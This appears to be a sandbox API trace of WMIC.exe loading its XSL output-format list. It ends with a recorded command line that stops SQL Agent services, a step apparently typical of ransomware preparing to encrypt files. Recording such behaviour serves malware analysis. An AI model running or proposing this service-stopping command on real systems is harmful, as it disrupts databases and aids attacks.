(param_1="XML") returned 0x3 [0243.159] SysStringLen (param_1="TABLE") returned 0x5 [0243.159] SysStringLen (param_1="XML") returned 0x3 [0243.159] SysStringLen (param_1="VALUE") returned 0x5 [0243.159] SysStringLen (param_1="VALUE") returned 0x5 [0243.159] SysStringLen (param_1="XML") returned 0x3 [0243.159] malloc (_Size=0x30) returned 0x478200 [0243.159] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.159] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.159] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.159] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=7, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.160] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="mof.xsl") returned 0x0 [0243.160] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.160] malloc (_Size=0x18) returned 0x47c720 [0243.160] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.160] free (_Block=0x47c720) [0243.160] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0243.160] malloc (_Size=0x18) returned 0x47c720 [0243.160] malloc (_Size=0x18) returned 0x47c740 [0243.160] SysStringLen (param_1="MOF") returned 0x3 [0243.160] SysStringLen (param_1="TABLE") returned 0x5 [0243.160] SysStringLen (param_1="MOF") returned 0x3 [0243.160] SysStringLen (param_1="LIST") returned 0x4 [0243.160] SysStringLen (param_1="MOF") returned 0x3 [0243.160] SysStringLen (param_1="RAWXML") returned 0x6 [0243.160] SysStringLen (param_1="LIST") returned 0x4 [0243.160] SysStringLen (param_1="MOF") returned 0x3 [0243.160] malloc (_Size=0x30) returned 0x478240 [0243.160] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.160] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.160] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.160] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=8, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.161] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="csv.xsl") returned 0x0 [0243.161] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.161] malloc (_Size=0x18) returned 0x47c760 [0243.161] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.161] free (_Block=0x47c760) [0243.161] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0243.161] malloc (_Size=0x18) returned 0x47c760 [0243.161] malloc (_Size=0x18) returned 0x47c780 [0243.161] SysStringLen (param_1="CSV") returned 0x3 [0243.161] SysStringLen (param_1="TABLE") returned 0x5 [0243.161] SysStringLen (param_1="CSV") returned 0x3 [0243.161] SysStringLen (param_1="LIST") returned 0x4 [0243.161] SysStringLen (param_1="CSV") returned 0x3 [0243.161] SysStringLen (param_1="HTABLE") returned 0x6 [0243.161] SysStringLen (param_1="CSV") returned 0x3 [0243.161] SysStringLen (param_1="HFORM") returned 0x5 [0243.161] malloc (_Size=0x30) returned 0x478280 [0243.161] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.161] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.161] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.161] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=9, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.162] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.162] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.162] malloc (_Size=0x18) returned 0x47c7a0 [0243.162] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.162] free (_Block=0x47c7a0) [0243.162] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0243.162] malloc (_Size=0x18) returned 0x47c7a0 [0243.162] malloc (_Size=0x18) returned 0x47c7c0 [0243.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.162] SysStringLen (param_1="TABLE") returned 0x5 [0243.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.162] SysStringLen (param_1="VALUE") returned 0x5 [0243.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.162] SysStringLen (param_1="XML") returned 0x3 [0243.162] SysStringLen (param_1="XML") returned 0x3 [0243.162] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.162] malloc (_Size=0x30) returned 0x4782c0 [0243.162] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.162] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.162] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.162] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=10, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.163] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.163] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.163] malloc (_Size=0x18) returned 0x47c7e0 [0243.163] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.163] free (_Block=0x47c7e0) [0243.163] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0243.163] malloc (_Size=0x18) returned 0x47c7e0 [0243.163] malloc (_Size=0x18) returned 0x47c800 [0243.163] SysStringLen (param_1="texttablewsys") returned 0xd [0243.163] SysStringLen (param_1="TABLE") returned 0x5 [0243.163] SysStringLen (param_1="texttablewsys") returned 0xd [0243.163] SysStringLen (param_1="XML") returned 0x3 [0243.163] SysStringLen (param_1="texttablewsys") returned 0xd [0243.163] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.163] SysStringLen (param_1="XML") returned 0x3 [0243.163] SysStringLen (param_1="texttablewsys") returned 0xd [0243.163] malloc (_Size=0x30) returned 0x478300 [0243.163] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.163] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.163] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.163] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=11, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.163] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.164] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.164] malloc (_Size=0x18) returned 0x47c820 [0243.164] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.164] free (_Block=0x47c820) [0243.164] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0243.164] malloc (_Size=0x18) returned 0x47c820 [0243.164] malloc (_Size=0x18) returned 0x47c840 [0243.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.164] SysStringLen (param_1="TABLE") returned 0x5 [0243.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.164] SysStringLen (param_1="XML") returned 0x3 [0243.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.164] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.164] malloc (_Size=0x30) returned 0x478340 [0243.164] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.164] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.164] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.164] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=12, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.165] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.165] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.165] malloc (_Size=0x18) returned 0x47c860 [0243.165] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.165] free (_Block=0x47c860) [0243.165] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0243.165] malloc (_Size=0x18) returned 0x47c860 [0243.165] malloc (_Size=0x18) returned 0x47c880 [0243.165] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.165] SysStringLen (param_1="TABLE") returned 0x5 [0243.165] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.165] SysStringLen (param_1="XML") returned 0x3 [0243.165] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.165] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.165] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.165] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.165] malloc (_Size=0x30) returned 0x478380 [0243.165] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.165] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.165] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.166] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=13, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.166] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.166] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.166] malloc (_Size=0x18) returned 0x47c8a0 [0243.166] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.166] free (_Block=0x47c8a0) [0243.166] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0243.166] malloc (_Size=0x18) returned 0x47c8a0 [0243.166] malloc (_Size=0x18) returned 0x47c8c0 [0243.166] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.166] SysStringLen (param_1="TABLE") returned 0x5 [0243.166] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.166] SysStringLen (param_1="XML") returned 0x3 [0243.166] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.166] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.166] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.166] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.166] malloc (_Size=0x30) returned 0x4783c0 [0243.166] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.167] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.167] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.167] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=14, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.167] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="texttable.xsl") returned 0x0 [0243.167] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.167] malloc (_Size=0x18) returned 0x47c8e0 [0243.167] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.167] free (_Block=0x47c8e0) [0243.167] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0243.167] malloc (_Size=0x18) returned 0x47c8e0 [0243.167] malloc (_Size=0x18) returned 0x47c900 [0243.167] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0243.167] SysStringLen (param_1="TABLE") returned 0x5 [0243.167] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0243.167] SysStringLen (param_1="XML") returned 0x3 [0243.167] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0243.167] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.167] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0243.167] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.167] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0243.167] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.167] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.167] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0243.168] malloc (_Size=0x30) returned 0x478400 [0243.168] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.168] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.168] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.168] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=15, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.168] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="htable.xsl") returned 0x0 [0243.168] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.168] malloc (_Size=0x18) returned 0x47c920 [0243.168] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.168] free (_Block=0x47c920) [0243.168] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0243.168] malloc (_Size=0x18) returned 0x47c920 [0243.168] malloc (_Size=0x18) returned 0x47c940 [0243.168] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0243.168] SysStringLen (param_1="TABLE") returned 0x5 [0243.168] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0243.168] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.168] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0243.169] SysStringLen (param_1="XML") returned 0x3 [0243.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0243.169] SysStringLen (param_1="texttablewsys") returned 0xd [0243.169] SysStringLen (param_1="XML") returned 0x3 [0243.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0243.169] malloc (_Size=0x30) returned 0x478440 [0243.169] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.169] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.169] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.169] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=16, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.169] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="htable.xsl") returned 0x0 [0243.169] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.169] malloc (_Size=0x18) returned 0x47c960 [0243.169] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.170] free (_Block=0x47c960) [0243.170] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0243.170] malloc (_Size=0x18) returned 0x47c960 [0243.170] malloc (_Size=0x18) returned 0x47c980 [0243.170] SysStringLen (param_1="htable-sortby") returned 0xd [0243.170] SysStringLen (param_1="TABLE") returned 0x5 [0243.170] SysStringLen (param_1="htable-sortby") returned 0xd [0243.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.170] SysStringLen (param_1="htable-sortby") returned 0xd [0243.170] SysStringLen (param_1="XML") returned 0x3 [0243.170] SysStringLen (param_1="htable-sortby") returned 0xd [0243.170] SysStringLen (param_1="texttablewsys") returned 0xd [0243.170] SysStringLen (param_1="htable-sortby") returned 0xd [0243.171] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0243.171] SysStringLen (param_1="XML") returned 0x3 [0243.171] SysStringLen (param_1="htable-sortby") returned 0xd [0243.171] malloc (_Size=0x30) returned 0x478480 [0243.171] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.171] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.171] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.171] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=17, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.171] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="mof.xsl") returned 0x0 [0243.171] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.171] malloc (_Size=0x18) returned 0x47c9a0 [0243.171] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.171] free (_Block=0x47c9a0) [0243.171] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0243.171] malloc (_Size=0x18) returned 0x47c9a0 [0243.171] malloc (_Size=0x18) returned 0x47c9c0 [0243.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0243.171] SysStringLen (param_1="TABLE") returned 0x5 [0243.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0243.171] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.172] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0243.172] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.172] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0243.172] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.172] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.172] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0243.172] malloc (_Size=0x30) returned 0x4784c0 [0243.172] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.172] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.172] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.172] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=18, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.172] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="mof.xsl") returned 0x0 [0243.172] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.172] malloc (_Size=0x18) returned 0x47c9e0 [0243.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.172] free (_Block=0x47c9e0) [0243.172] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0243.172] malloc (_Size=0x18) returned 0x47c9e0 [0243.172] malloc (_Size=0x18) returned 0x47ca00 [0243.172] SysStringLen (param_1="wmiclimofformat") returned 0xf [0243.172] SysStringLen (param_1="TABLE") returned 0x5 [0243.173] SysStringLen (param_1="wmiclimofformat") returned 0xf [0243.173] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.173] SysStringLen (param_1="wmiclimofformat") returned 0xf [0243.173] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.173] SysStringLen (param_1="wmiclimofformat") returned 0xf [0243.173] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0243.173] SysStringLen (param_1="wmiclimofformat") returned 0xf [0243.173] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0243.173] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.173] SysStringLen (param_1="wmiclimofformat") returned 0xf [0243.173] malloc (_Size=0x30) returned 0x478500 [0243.173] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.173] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.173] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.173] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=19, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.173] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="textvaluelist.xsl") returned 0x0 [0243.173] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.173] malloc (_Size=0x18) returned 0x47ca20 [0243.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.173] free (_Block=0x47ca20) [0243.173] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0243.173] malloc (_Size=0x18) returned 0x47ca20 [0243.174] malloc (_Size=0x18) returned 0x47ca40 [0243.174] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0243.174] SysStringLen (param_1="TABLE") returned 0x5 [0243.174] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0243.174] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.174] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0243.174] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.174] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0243.174] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.174] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.174] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0243.174] malloc (_Size=0x30) returned 0x478540 [0243.174] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.174] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.174] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.174] IXMLDOMNodeList:get_item (in: This=0x1c79cc0, index=20, listItem=0xaf630 | out: listItem=0xaf630*=0x1c7bd50) returned 0x0 [0243.174] IXMLDOMNode:get_text (in: This=0x1c7bd50, text=0xaf640 | out: text=0xaf640*="textvaluelist.xsl") returned 0x0 [0243.174] IXMLDOMNode:get_attributes (in: This=0x1c7bd50, attributeMap=0xaf638 | out: attributeMap=0xaf638*=0x1c778d0) returned 0x0 [0243.174] malloc (_Size=0x18) returned 0x47ca60 [0243.174] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1c778d0, name="KEYWORD", namedItem=0xaf648 | out: namedItem=0xaf648*=0x1c7a280) returned 0x0 [0243.174] free (_Block=0x47ca60) [0243.175] IXMLDOMNode:get_nodeValue (in: This=0x1c7a280, value=0xaf680 | out: value=0xaf680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0243.175] malloc (_Size=0x18) returned 0x47ca60 [0243.175] malloc (_Size=0x18) returned 0x47ca80 [0243.175] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0243.175] SysStringLen (param_1="TABLE") returned 0x5 [0243.175] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0243.175] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0243.175] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0243.175] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0243.175] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0243.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.175] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0243.175] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0243.175] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0243.175] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0243.175] malloc (_Size=0x30) returned 0x478580 [0243.175] IUnknown:Release (This=0x1c7bd50) returned 0x0 [0243.175] IUnknown:Release (This=0x1c778d0) returned 0x0 [0243.175] IUnknown:Release (This=0x1c7a280) returned 0x0 [0243.175] IUnknown:Release (This=0x1c79cc0) returned 0x0 [0243.175] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c7bc50) returned 0x1 [0243.175] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c771d0) returned 0x0 [0243.175] free (_Block=0x476f30) [0243.175] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice" [0243.176] malloc (_Size=0xe0) returned 0x476ef0 [0243.176] memcpy_s (in: _Destination=0x476ef0, _DestinationSize=0xde, _Source=0x2025ee, _SourceSize=0xd2 | out: _Destination=0x476ef0) returned 0x0 [0243.176] malloc (_Size=0x18) returned 0x47caa0 [0243.176] malloc (_Size=0x18) returned 0x47cac0 [0243.176] malloc (_Size=0x18) returned 0x47cae0 [0243.176] malloc (_Size=0x18) returned 0x47cb00 [0243.176] malloc (_Size=0x80) returned 0x47cd30 [0243.176] GetLocalTime (in: lpSystemTime=0xaf7f0 | out: lpSystemTime=0xaf7f0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0x2, wMilliseconds=0x2c)) [0243.176] _vsnwprintf (in: _Buffer=0x47cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xaf748 | out: _Buffer="04-28-2020T20:42:02") returned 19 [0243.176] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.176] malloc (_Size=0x8e) returned 0x47cdc0 